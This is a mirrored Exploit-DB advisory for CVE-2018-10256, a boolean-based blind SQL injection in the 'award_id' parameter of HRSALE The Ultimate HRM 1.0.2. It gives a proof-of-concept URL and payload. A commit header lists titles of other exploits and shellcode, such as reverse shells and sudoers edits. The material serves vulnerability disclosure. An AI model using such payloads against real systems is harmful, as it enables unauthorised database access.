bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/44537.txt
Offensive Security 2090553629 DB: 2018-04-26 
12 changes to exploits/shellcodes

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read
VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service
Microsoft Internet Explorer 11.371.16299.0 (Windows 10) - Denial Of Service
VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)
Chrome V8 JIT - 'AwaitedPromise' Update Bug
Chrome V8 JIT - Arrow Function Scope Fixing Bug

Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC

Shopy Point of Sale v1.0 - CSV Injection
Blog Master Pro v1.0 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting
HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion

Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode
Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)
Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)
Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)
2018-04-26 05:01:48 +00:00

33 lines
No EOL
1.1 KiB
Text
Raw Blame History

# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10256
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
SQL injection on [award_id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
Parameter: award_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
Reference in a new issue View git blame Copy permalink